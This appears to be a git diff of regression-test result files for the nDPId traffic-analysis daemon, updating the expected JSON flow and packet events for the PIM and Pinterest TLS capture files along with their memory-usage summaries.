-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1655247781655,"flow_last_seen":1655247790665,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1655247790665,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1655247781655,"flow_last_seen":1655247790665,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1655247790665,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"pim.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1655247790665} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869705 bytes -~~ total memory freed........: 5869705 bytes -~~ total allocations/frees...: 118123/118123 +~~ total memory allocated....: 6003339 bytes +~~ total memory freed........: 6003339 bytes +~~ total allocations/frees...: 120885/120885 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 648 chars diff --git a/test/results/pinterest.pcap.out b/test/results/pinterest.pcap.out index 6f72c4282..71cde5cb5 100644 --- a/test/results/pinterest.pcap.out +++ b/test/results/pinterest.pcap.out @@ -10,9 +10,9 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -27,10 +27,10 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} @@ -39,22 +39,22 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="} 